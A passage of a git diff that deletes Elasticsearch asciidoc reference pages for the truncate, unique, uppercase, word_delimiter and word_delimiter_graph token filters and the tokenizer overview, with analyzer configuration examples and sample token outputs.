-`5_char_trunc`, that shortens tokens to a `length` of `5` or fewer characters: - -[source,console] --------------------------------------------------- -PUT 5_char_words_example -{ - "settings": { - "analysis": { - "analyzer": { - "lowercase_5_char": { - "tokenizer": "lowercase", - "filter": [ "5_char_trunc" ] - } - }, - "filter": { - "5_char_trunc": { - "type": "truncate", - "length": 5 - } - } - } - } -} --------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/unique-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/unique-tokenfilter.asciidoc deleted file mode 100644 index 5afed11923a..00000000000 --- a/docs/reference/analysis/tokenfilters/unique-tokenfilter.asciidoc +++ /dev/null @@ -1,150 +0,0 @@ -[[analysis-unique-tokenfilter]] -=== Unique token filter -++++ -Unique -++++ - -Removes duplicate tokens from a stream. For example, you can use the `unique` -filter to change `the lazy lazy dog` to `the lazy dog`. - -If the `only_on_same_position` parameter is set to `true`, the `unique` filter -removes only duplicate tokens _in the same position_. - -[NOTE] -==== -When `only_on_same_position` is `true`, the `unique` filter works the same as -<> filter. -==== - -[[analysis-unique-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `unique` filter -to remove duplicate tokens from `the quick fox jumps the lazy fox`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "whitespace", - "filter" : ["unique"], - "text" : "the quick fox jumps the lazy fox" -} --------------------------------------------------- - -The filter removes duplicated tokens for `the` and `fox`, producing the -following output: - -[source,text] --------------------------------------------------- -[ the, quick, fox, jumps, lazy ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "word", - "position" : 0 - }, - { - "token" : "quick", - "start_offset" : 4, - "end_offset" : 9, - "type" : "word", - "position" : 1 - }, - { - "token" : "fox", - "start_offset" : 10, - "end_offset" : 13, - "type" : "word", - "position" : 2 - }, - { - "token" : "jumps", - "start_offset" : 14, - "end_offset" : 19, - "type" : "word", - "position" : 3 - }, - { - "token" : "lazy", - "start_offset" : 24, - "end_offset" : 28, - "type" : "word", - "position" : 4 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-unique-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`unique` filter to configure a new <>. - -[source,console] --------------------------------------------------- -PUT custom_unique_example -{ - "settings" : { - "analysis" : { - "analyzer" : { - "standard_truncate" : { - "tokenizer" : "standard", - "filter" : ["unique"] - } - } - } - } -} --------------------------------------------------- - -[[analysis-unique-tokenfilter-configure-parms]] -==== Configurable parameters - -`only_on_same_position`:: -(Optional, Boolean) -If `true`, only remove duplicate tokens in the same position. -Defaults to `false`. - -[[analysis-unique-tokenfilter-customize]] -==== Customize - -To customize the `unique` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `unique` filter with -`only_on_same_position` set to `true`. - -[source,console] --------------------------------------------------- -PUT letter_unique_pos_example -{ - "settings": { - "analysis": { - "analyzer": { - "letter_unique_pos": { - "tokenizer": "letter", - "filter": [ "unique_pos" ] - } - }, - "filter": { - "unique_pos": { - "type": "unique", - "only_on_same_position": true - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/uppercase-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/uppercase-tokenfilter.asciidoc deleted file mode 100644 index 9192a46810a..00000000000 --- a/docs/reference/analysis/tokenfilters/uppercase-tokenfilter.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ -[[analysis-uppercase-tokenfilter]] -=== Uppercase token filter -++++ -Uppercase -++++ - -Changes token text to uppercase. For example, you can use the `uppercase` filter -to change `the Lazy DoG` to `THE LAZY DOG`. - -This filter uses Lucene's -{lucene-analysis-docs}/core/UpperCaseFilter.html[UpperCaseFilter]. - -[WARNING] -==== -Depending on the language, an uppercase character can map to multiple -lowercase characters. Using the `uppercase` filter could result in the loss of -lowercase character information. - -To avoid this loss but still have a consistent letter case, use the -<> filter instead. -==== - -[[analysis-uppercase-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the default -`uppercase` filter to change the `the Quick FoX JUMPs` to uppercase: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "standard", - "filter" : ["uppercase"], - "text" : "the Quick FoX JUMPs" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ THE, QUICK, FOX, JUMPS ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "THE", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "QUICK", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "FOX", - "start_offset" : 10, - "end_offset" : 13, - "type" : "", - "position" : 2 - }, - { - "token" : "JUMPS", - "start_offset" : 14, - "end_offset" : 19, - "type" : "", - "position" : 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-uppercase-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`uppercase` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT uppercase_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_uppercase": { - "tokenizer": "whitespace", - "filter": [ "uppercase" ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/word-delimiter-graph-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/word-delimiter-graph-tokenfilter.asciidoc deleted file mode 100644 index 2999df6a9a1..00000000000 --- a/docs/reference/analysis/tokenfilters/word-delimiter-graph-tokenfilter.asciidoc +++ /dev/null @@ -1,505 +0,0 @@ -[[analysis-word-delimiter-graph-tokenfilter]] -=== Word delimiter graph token filter -++++ -Word delimiter graph -++++ - -Splits tokens at non-alphanumeric characters. The `word_delimiter_graph` filter -also performs optional token normalization based on a set of rules. By default, -the filter uses the following rules: - -* Split tokens at non-alphanumeric characters. - The filter uses these characters as delimiters. - For example: `Super-Duper` -> `Super`, `Duper` -* Remove leading or trailing delimiters from each token. - For example: `XL---42+'Autocoder'` -> `XL`, `42`, `Autocoder` -* Split tokens at letter case transitions. - For example: `PowerShot` -> `Power`, `Shot` -* Split tokens at letter-number transitions. - For example: `XL500` -> `XL`, `500` -* Remove the English possessive (`'s`) from the end of each token. - For example: `Neil's` -> `Neil` - -The `word_delimiter_graph` filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/WordDelimiterGraphFilter.html[WordDelimiterGraphFilter]. - -[TIP] -==== -The `word_delimiter_graph` filter was designed to remove punctuation from -complex identifiers, such as product IDs or part numbers. For these use cases, -we recommend using the `word_delimiter_graph` filter with the -<> tokenizer. - -Avoid using the `word_delimiter_graph` filter to split hyphenated words, such as -`wi-fi`. Because users often search for these words both with and without -hyphens, we recommend using the -<> filter instead. -==== - -[[analysis-word-delimiter-graph-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`word_delimiter_graph` filter to split `Neil's-Super-Duper-XL500--42+AutoCoder` -into normalized tokens using the filter's default rules: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "keyword", - "filter": [ "word_delimiter_graph" ], - "text": "Neil's-Super-Duper-XL500--42+AutoCoder" -} ----- - -The filter produces the following tokens: - -[source,txt] ----- -[ Neil, Super, Duper, XL, 500, 42, Auto, Coder ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "Neil", - "start_offset": 0, - "end_offset": 4, - "type": "word", - "position": 0 - }, - { - "token": "Super", - "start_offset": 7, - "end_offset": 12, - "type": "word", - "position": 1 - }, - { - "token": "Duper", - "start_offset": 13, - "end_offset": 18, - "type": "word", - "position": 2 - }, - { - "token": "XL", - "start_offset": 19, - "end_offset": 21, - "type": "word", - "position": 3 - }, - { - "token": "500", - "start_offset": 21, - "end_offset": 24, - "type": "word", - "position": 4 - }, - { - "token": "42", - "start_offset": 26, - "end_offset": 28, - "type": "word", - "position": 5 - }, - { - "token": "Auto", - "start_offset": 29, - "end_offset": 33, - "type": "word", - "position": 6 - }, - { - "token": "Coder", - "start_offset": 33, - "end_offset": 38, - "type": "word", - "position": 7 - } - ] -} ----- -//// - -[[analysis-word-delimiter-graph-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`word_delimiter_graph` filter to configure a new -<>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "filter": [ "word_delimiter_graph" ] - } - } - } - } -} ----- - -[WARNING] -==== -Avoid using the `word_delimiter_graph` filter with tokenizers that remove -punctuation, such as the <> tokenizer. -This could prevent the `word_delimiter_graph` filter from splitting tokens -correctly. It can also interfere with the filter's configurable parameters, such -as <> or -<>. We -recommend using the <> or -<> tokenizer instead. -==== - -[[word-delimiter-graph-tokenfilter-configure-parms]] -==== Configurable parameters - -[[word-delimiter-graph-tokenfilter-adjust-offsets]] -`adjust_offsets`:: -+ --- -(Optional, Boolean) -If `true`, the filter adjusts the offsets of split or catenated tokens to better -reflect their actual position in the token stream. Defaults to `true`. - -[WARNING] -==== -Set `adjust_offsets` to `false` if your analyzer uses filters, such as the -<> filter, that change the length of tokens -without changing their offsets. Otherwise, the `word_delimiter_graph` filter -could produce tokens with illegal offsets. -==== --- - -[[word-delimiter-graph-tokenfilter-catenate-all]] -`catenate_all`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of alphanumeric -characters separated by non-alphabetic delimiters. For example: -`super-duper-xl-500` -> [ **`superduperxl500`**, `super`, `duper`, `xl`, `500` ]. -Defaults to `false`. - -[WARNING] -==== -Setting this parameter to `true` produces multi-position tokens, which are not -supported by indexing. - -If this parameter is `true`, avoid using this filter in an index analyzer or -use the <> filter after -this filter to make the token stream suitable for indexing. - -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -[[word-delimiter-graph-tokenfilter-catenate-numbers]] -`catenate_numbers`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of numeric characters -separated by non-alphabetic delimiters. For example: `01-02-03` -> -[ **`010203`**, `01`, `02`, `03` ]. Defaults to `false`. - -[WARNING] -==== -Setting this parameter to `true` produces multi-position tokens, which are not -supported by indexing. - -If this parameter is `true`, avoid using this filter in an index analyzer or -use the <> filter after -this filter to make the token stream suitable for indexing. - -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -[[word-delimiter-graph-tokenfilter-catenate-words]] -`catenate_words`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of alphabetical -characters separated by non-alphabetic delimiters. For example: `super-duper-xl` --> [ **`superduperxl`**, `super`, `duper`, `xl` ]. Defaults to `false`. - -[WARNING] -==== -Setting this parameter to `true` produces multi-position tokens, which are not -supported by indexing. - -If this parameter is `true`, avoid using this filter in an index analyzer or -use the <> filter after -this filter to make the token stream suitable for indexing. - -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -`generate_number_parts`:: -(Optional, Boolean) -If `true`, the filter includes tokens consisting of only numeric characters in -the output. If `false`, the filter excludes these tokens from the output. -Defaults to `true`. - -`generate_word_parts`:: -(Optional, Boolean) -If `true`, the filter includes tokens consisting of only alphabetical characters -in the output. If `false`, the filter excludes these tokens from the output. -Defaults to `true`. - -`ignore_keywords`:: -(Optional, Boolean) -If `true`, the filter skips tokens with -a `keyword` attribute of `true`. -Defaults to `false`. - -[[word-delimiter-graph-tokenfilter-preserve-original]] -`preserve_original`:: -+ --- -(Optional, Boolean) -If `true`, the filter includes the original version of any split tokens in the -output. This original version includes non-alphanumeric delimiters. For example: -`super-duper-xl-500` -> [ **`super-duper-xl-500`**, `super`, `duper`, `xl`, -`500` ]. Defaults to `false`. - -[WARNING] -==== -Setting this parameter to `true` produces multi-position tokens, which are not -supported by indexing. - -If this parameter is `true`, avoid using this filter in an index analyzer or -use the <> filter after -this filter to make the token stream suitable for indexing. -==== --- - -`protected_words`:: -(Optional, array of strings) -Array of tokens the filter won't split. - -`protected_words_path`:: -+ --- -(Optional, string) -Path to a file that contains a list of tokens the filter won't split. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each token in the file must be separated by a line -break. --- - -`split_on_case_change`:: -(Optional, Boolean) -If `true`, the filter splits tokens at letter case transitions. For example: -`camelCase` -> [ `camel`, `Case` ]. Defaults to `true`. - -`split_on_numerics`:: -(Optional, Boolean) -If `true`, the filter splits tokens at letter-number transitions. For example: -`j2se` -> [ `j`, `2`, `se` ]. Defaults to `true`. - -`stem_english_possessive`:: -(Optional, Boolean) -If `true`, the filter removes the English possessive (`'s`) from the end of each -token. For example: `O'Neil's` -> [ `O`, `Neil` ]. Defaults to `true`. - -`type_table`:: -+ --- -(Optional, array of strings) -Array of custom type mappings for characters. This allows you to map -non-alphanumeric characters as numeric or alphanumeric to avoid splitting on -those characters. - -For example, the following array maps the plus (`+`) and hyphen (`-`) characters -as alphanumeric, which means they won't be treated as delimiters: - -`[ "+ => ALPHA", "- => ALPHA" ]` - -Supported types include: - -* `ALPHA` (Alphabetical) -* `ALPHANUM` (Alphanumeric) -* `DIGIT` (Numeric) -* `LOWER` (Lowercase alphabetical) -* `SUBWORD_DELIM` (Non-alphanumeric delimiter) -* `UPPER` (Uppercase alphabetical) --- - -`type_table_path`:: -+ --- -(Optional, string) -Path to a file that contains custom type mappings for characters. This allows -you to map non-alphanumeric characters as numeric or alphanumeric to avoid -splitting on those characters. - -For example, the contents of this file may contain the following: - -[source,txt] ----- -# Map the $, %, '.', and ',' characters to DIGIT -# This might be useful for financial data. -$ => DIGIT -% => DIGIT -. => DIGIT -\\u002C => DIGIT - -# in some cases you might not want to split on ZWJ -# this also tests the case where we need a bigger byte[] -# see https://en.wikipedia.org/wiki/Zero-width_joiner -\\u200D => ALPHANUM ----- - -Supported types include: - -* `ALPHA` (Alphabetical) -* `ALPHANUM` (Alphanumeric) -* `DIGIT` (Numeric) -* `LOWER` (Lowercase alphabetical) -* `SUBWORD_DELIM` (Non-alphanumeric delimiter) -* `UPPER` (Uppercase alphabetical) - -This file path must be absolute or relative to the `config` location, and the -file must be UTF-8 encoded. Each mapping in the file must be separated by a line -break. --- - -[[analysis-word-delimiter-graph-tokenfilter-customize]] -==== Customize - -To customize the `word_delimiter_graph` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a `word_delimiter_graph` -filter that uses the following rules: - -* Split tokens at non-alphanumeric characters, _except_ the hyphen (`-`) - character. -* Remove leading or trailing delimiters from each token. -* Do _not_ split tokens at letter case transitions. -* Do _not_ split tokens at letter-number transitions. -* Remove the English possessive (`'s`) from the end of each token. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "filter": [ "my_custom_word_delimiter_graph_filter" ] - } - }, - "filter": { - "my_custom_word_delimiter_graph_filter": { - "type": "word_delimiter_graph", - "type_table": [ "- => ALPHA" ], - "split_on_case_change": false, - "split_on_numerics": false, - "stem_english_possessive": true - } - } - } - } -} ----- - -[[analysis-word-delimiter-graph-differences]] -==== Differences between `word_delimiter_graph` and `word_delimiter` - -Both the `word_delimiter_graph` and -<> filters produce tokens -that span multiple positions when any of the following parameters are `true`: - - * <> - * <> - * <> - * <> - -However, only the `word_delimiter_graph` filter assigns multi-position tokens a -`positionLength` attribute, which indicates the number of positions a token -spans. This ensures the `word_delimiter_graph` filter always produces valid -<>. - -The `word_delimiter` filter does not assign multi-position tokens a -`positionLength` attribute. This means it produces invalid graphs for streams -including these tokens. - -While indexing does not support token graphs containing multi-position tokens, -queries, such as the <> query, can -use these graphs to generate multiple sub-queries from a single query string. - -To see how token graphs produced by the `word_delimiter` and -`word_delimiter_graph` filters differ, check out the following example. - -.*Example* -[%collapsible] -==== - -[[analysis-word-delimiter-graph-basic-token-graph]] -*Basic token graph* - -Both the `word_delimiter` and `word_delimiter_graph` produce the following token -graph for `PowerShot2000` when the following parameters are `false`: - - * <> - * <> - * <> - * <> - -This graph does not contain multi-position tokens. All tokens span only one -position. - -image::images/analysis/token-graph-basic.svg[align="center"] - -[[analysis-word-delimiter-graph-wdg-token-graph]] -*`word_delimiter_graph` graph with a multi-position token* - -The `word_delimiter_graph` filter produces the following token graph for -`PowerShot2000` when `catenate_words` is `true`. - -This graph correctly indicates the catenated `PowerShot` token spans two -positions. - -image::images/analysis/token-graph-wdg.svg[align="center"] - -[[analysis-word-delimiter-graph-wd-token-graph]] -*`word_delimiter` graph with a multi-position token* - -When `catenate_words` is `true`, the `word_delimiter` filter produces -the following token graph for `PowerShot2000`. - -Note that the catenated `PowerShot` token should span two positions but only -spans one in the token graph, making it invalid. - -image::images/analysis/token-graph-wd.svg[align="center"] - -==== diff --git a/docs/reference/analysis/tokenfilters/word-delimiter-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/word-delimiter-tokenfilter.asciidoc deleted file mode 100644 index c65dade6272..00000000000 --- a/docs/reference/analysis/tokenfilters/word-delimiter-tokenfilter.asciidoc +++ /dev/null @@ -1,382 +0,0 @@ -[[analysis-word-delimiter-tokenfilter]] -=== Word delimiter token filter -++++ -Word delimiter -++++ - -[WARNING] -==== -We recommend using the -<> instead of -the `word_delimiter` filter. - -The `word_delimiter` filter can produce invalid token graphs. See -<>. - -The `word_delimiter` filter also uses Lucene's -{lucene-analysis-docs}/miscellaneous/WordDelimiterFilter.html[WordDelimiterFilter], -which is marked as deprecated. -==== - -Splits tokens at non-alphanumeric characters. The `word_delimiter` filter -also performs optional token normalization based on a set of rules. By default, -the filter uses the following rules: - -* Split tokens at non-alphanumeric characters. - The filter uses these characters as delimiters. - For example: `Super-Duper` -> `Super`, `Duper` -* Remove leading or trailing delimiters from each token. - For example: `XL---42+'Autocoder'` -> `XL`, `42`, `Autocoder` -* Split tokens at letter case transitions. - For example: `PowerShot` -> `Power`, `Shot` -* Split tokens at letter-number transitions. - For example: `XL500` -> `XL`, `500` -* Remove the English possessive (`'s`) from the end of each token. - For example: `Neil's` -> `Neil` - -[TIP] -==== -The `word_delimiter` filter was designed to remove punctuation from complex -identifiers, such as product IDs or part numbers. For these use cases, we -recommend using the `word_delimiter` filter with the -<> tokenizer. - -Avoid using the `word_delimiter` filter to split hyphenated words, such as -`wi-fi`. Because users often search for these words both with and without -hyphens, we recommend using the -<> filter instead. -==== - -[[analysis-word-delimiter-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`word_delimiter` filter to split `Neil's-Super-Duper-XL500--42+AutoCoder` -into normalized tokens using the filter's default rules: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "keyword", - "filter": [ "word_delimiter" ], - "text": "Neil's-Super-Duper-XL500--42+AutoCoder" -} ----- - -The filter produces the following tokens: - -[source,txt] ----- -[ Neil, Super, Duper, XL, 500, 42, Auto, Coder ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "Neil", - "start_offset": 0, - "end_offset": 4, - "type": "word", - "position": 0 - }, - { - "token": "Super", - "start_offset": 7, - "end_offset": 12, - "type": "word", - "position": 1 - }, - { - "token": "Duper", - "start_offset": 13, - "end_offset": 18, - "type": "word", - "position": 2 - }, - { - "token": "XL", - "start_offset": 19, - "end_offset": 21, - "type": "word", - "position": 3 - }, - { - "token": "500", - "start_offset": 21, - "end_offset": 24, - "type": "word", - "position": 4 - }, - { - "token": "42", - "start_offset": 26, - "end_offset": 28, - "type": "word", - "position": 5 - }, - { - "token": "Auto", - "start_offset": 29, - "end_offset": 33, - "type": "word", - "position": 6 - }, - { - "token": "Coder", - "start_offset": 33, - "end_offset": 38, - "type": "word", - "position": 7 - } - ] -} ----- -//// - -[analysis-word-delimiter-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`word_delimiter` filter to configure a new -<>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "filter": [ "word_delimiter" ] - } - } - } - } -} ----- - -[WARNING] -==== -Avoid using the `word_delimiter` filter with tokenizers that remove punctuation, -such as the <> tokenizer. This could -prevent the `word_delimiter` filter from splitting tokens correctly. It can also -interfere with the filter's configurable parameters, such as `catenate_all` or -`preserve_original`. We recommend using the -<> or -<> tokenizer instead. -==== - -[[word-delimiter-tokenfilter-configure-parms]] -==== Configurable parameters - -`catenate_all`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of alphanumeric -characters separated by non-alphabetic delimiters. For example: -`super-duper-xl-500` -> [ `super`, **`superduperxl500`**, `duper`, `xl`, `500` -]. Defaults to `false`. - -[WARNING] -==== -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -`catenate_numbers`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of numeric characters -separated by non-alphabetic delimiters. For example: `01-02-03` -> -[ `01`, **`010203`**, `02`, `03` ]. Defaults to `false`. - -[WARNING] -==== -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -`catenate_words`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of alphabetical -characters separated by non-alphabetic delimiters. For example: `super-duper-xl` --> [ `super`, **`superduperxl`**, `duper`, `xl` ]. Defaults to `false`. - -[WARNING] -==== -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -`generate_number_parts`:: -(Optional, Boolean) -If `true`, the filter includes tokens consisting of only numeric characters in -the output. If `false`, the filter excludes these tokens from the output. -Defaults to `true`. - -`generate_word_parts`:: -(Optional, Boolean) -If `true`, the filter includes tokens consisting of only alphabetical characters -in the output. If `false`, the filter excludes these tokens from the output. -Defaults to `true`. - -`preserve_original`:: -(Optional, Boolean) -If `true`, the filter includes the original version of any split tokens in the -output. This original version includes non-alphanumeric delimiters. For example: -`super-duper-xl-500` -> [ **`super-duper-xl-500`**, `super`, `duper`, `xl`, -`500` ]. Defaults to `false`. - -`protected_words`:: -(Optional, array of strings) -Array of tokens the filter won't split. - -`protected_words_path`:: -+ --- -(Optional, string) -Path to a file that contains a list of tokens the filter won't split. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each token in the file must be separated by a line -break. --- - -`split_on_case_change`:: -(Optional, Boolean) -If `true`, the filter splits tokens at letter case transitions. For example: -`camelCase` -> [ `camel`, `Case` ]. Defaults to `true`. - -`split_on_numerics`:: -(Optional, Boolean) -If `true`, the filter splits tokens at letter-number transitions. For example: -`j2se` -> [ `j`, `2`, `se` ]. Defaults to `true`. - -`stem_english_possessive`:: -(Optional, Boolean) -If `true`, the filter removes the English possessive (`'s`) from the end of each -token. For example: `O'Neil's` -> [ `O`, `Neil` ]. Defaults to `true`. - -`type_table`:: -+ --- -(Optional, array of strings) -Array of custom type mappings for characters. This allows you to map -non-alphanumeric characters as numeric or alphanumeric to avoid splitting on -those characters. - -For example, the following array maps the plus (`+`) and hyphen (`-`) characters -as alphanumeric, which means they won't be treated as delimiters: - -`[ "+ => ALPHA", "- => ALPHA" ]` - -Supported types include: - -* `ALPHA` (Alphabetical) -* `ALPHANUM` (Alphanumeric) -* `DIGIT` (Numeric) -* `LOWER` (Lowercase alphabetical) -* `SUBWORD_DELIM` (Non-alphanumeric delimiter) -* `UPPER` (Uppercase alphabetical) --- - -`type_table_path`:: -+ --- -(Optional, string) -Path to a file that contains custom type mappings for characters. This allows -you to map non-alphanumeric characters as numeric or alphanumeric to avoid -splitting on those characters. - -For example, the contents of this file may contain the following: - -[source,txt] ----- -# Map the $, %, '.', and ',' characters to DIGIT -# This might be useful for financial data. -$ => DIGIT -% => DIGIT -. => DIGIT -\\u002C => DIGIT - -# in some cases you might not want to split on ZWJ -# this also tests the case where we need a bigger byte[] -# see https://en.wikipedia.org/wiki/Zero-width_joiner -\\u200D => ALPHANUM ----- - -Supported types include: - -* `ALPHA` (Alphabetical) -* `ALPHANUM` (Alphanumeric) -* `DIGIT` (Numeric) -* `LOWER` (Lowercase alphabetical) -* `SUBWORD_DELIM` (Non-alphanumeric delimiter) -* `UPPER` (Uppercase alphabetical) - -This file path must be absolute or relative to the `config` location, and the -file must be UTF-8 encoded. Each mapping in the file must be separated by a line -break. --- - -[[analysis-word-delimiter-tokenfilter-customize]] -==== Customize - -To customize the `word_delimiter` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a `word_delimiter` -filter that uses the following rules: - -* Split tokens at non-alphanumeric characters, _except_ the hyphen (`-`) - character. -* Remove leading or trailing delimiters from each token. -* Do _not_ split tokens at letter case transitions. -* Do _not_ split tokens at letter-number transitions. -* Remove the English possessive (`'s`) from the end of each token. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "filter": [ "my_custom_word_delimiter_filter" ] - } - }, - "filter": { - "my_custom_word_delimiter_filter": { - "type": "word_delimiter", - "type_table": [ "- => ALPHA" ], - "split_on_case_change": false, - "split_on_numerics": false, - "stem_english_possessive": true - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenizers.asciidoc b/docs/reference/analysis/tokenizers.asciidoc deleted file mode 100644 index fa47c05e3a0..00000000000 --- a/docs/reference/analysis/tokenizers.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[[analysis-tokenizers]] -== Tokenizer reference - -A _tokenizer_ receives a stream of characters, breaks it up into individual -_tokens_ (usually individual words), and outputs a stream of _tokens_. For -instance, a <> tokenizer breaks -text into tokens whenever it sees any whitespace. It would convert the text -`"Quick brown fox!"` into the terms `[Quick, brown, fox!]`. - -The tokenizer is also responsible for recording the following: - -* Order or _position_ of each term (used for phrase and word proximity queries) -* Start and end _character offsets_ of the original word which the term -represents (used for highlighting search snippets). -* _Token type_, a classification of each term produced, such as ``, -``, or ``. Simpler analyzers only produce the `word` token type. - -Elasticsearch has a number of built in tokenizers which can be used to build -<>. - -[discrete] -=== Word Oriented Tokenizers - -The following tokenizers are usually used for tokenizing full text into -individual words: - -<>:: - -The `standard` tokenizer divides text into terms on word boundaries, as -defined by the Unicode Text Segmentation algorithm. It removes most -punctuation symbols. It is the best choice for most languages. - -<>:: - -The `letter` tokenizer divides text into terms whenever it encounters a -character which is not a letter. - -<>:: - -The `lowercase` tokenizer, like the `letter` tokenizer, divides text into -terms whenever it encounters a character which is not a letter, but it also -lowercases all terms. - -<>:: - -The `whitespace` tokenizer divides text into terms whenever it encounters any -whitespace character. - -<>:: - -The `uax_url_email` tokenizer is like the `standard` tokenizer except that it -recognises URLs and email addresses as single tokens. - -<>:: - -The `classic` tokenizer is a grammar based tokenizer for the English Language. - -<>:: - -The `thai` tokenizer segments Thai text into words. - -[discrete] -=== Partial Word Tokenizers - -These tokenizers break up text or words into small fragments, for partial word -matching: - -<>:: - -The `ngram` tokenizer can break up text into words when it encounters any of -a list of specified characters (e.g. whitespace or punctuation), then it returns -n-grams of each word: a sliding window of continuous letters, e.g. `quick` -> -`[qu, ui, ic, ck]`. - -<>:: - -The `edge_ngram` tokenizer can break up text into words when it encounters any of -a list of specified characters (e.g. whitespace or punctuation), then it returns -n-grams of each word which are anchored to the start of the word, e.g. `quick` -> -`[q, qu, qui, quic, quick]`. - - -[discrete] -=== Structured Text Tokenizers - -The following tokenizers are usually used with structured text like -identifiers, email addresses, zip codes, and paths, rather than with full -text: - -<>:: - -The `keyword` tokenizer is a ``noop'' tokenizer that accepts whatever text it -is given and outputs the exact same text as a single term. It can be combined -with token filters like <> to -normalise the analysed terms. - -<>:: - -The `pattern` tokenizer uses a regular expression to either split text into -terms whenever it matches a word separator, or to capture matching text as -terms. - -<>:: - -The `simple_pattern` tokenizer uses a regular expression to capture matching -text as terms. It uses a restricted subset of regular expression features -and is generally faster than the `pattern` tokenizer. - -<>:: - -The `char_group` tokenizer is configurable through sets of characters to split -on, which is usually less expensive than running regular expressions. - -<>:: - -The `simple_pattern_split` tokenizer uses the same restricted regular expression -subset as the `simple_pattern` tokenizer, but splits the input at matches rather -than returning the matches as terms. - -<>:: - -The `path_hierarchy` tokenizer takes a hierarchical value like a filesystem -path, splits on the path separator, and emits a term for each component in the -tree, e.g. `/foo/bar/baz` -> `[/foo, /foo/bar, /foo/bar/baz ]`. - - -include::tokenizers/chargroup-tokenizer.asciidoc[] - -include::tokenizers/classic-tokenizer.asciidoc[] - -include::tokenizers/edgengram-tokenizer.asciidoc[] - -include::tokenizers/keyword-tokenizer.asciidoc[] - -include::tokenizers/letter-tokenizer.asciidoc[] - -include::tokenizers/lowercase-tokenizer.asciidoc[] - -include::tokenizers/ngram-tokenizer.asciidoc[] - -include::tokenizers/pathhierarchy-tokenizer.asciidoc[] - -include::tokenizers/pattern-tokenizer.asciidoc[] - -include::tokenizers/simplepattern-tokenizer.asciidoc[] - -include::tokenizers/simplepatternsplit-tokenizer.asciidoc[] - -include::tokenizers/standard-tokenizer.asciidoc[] - -include::tokenizers/thai-tokenizer.asciidoc[] - -include::tokenizers/uaxurlemail-tokenizer.asciidoc[] - -include::tokenizers/whitespace-tokenizer.asciidoc[] diff --git 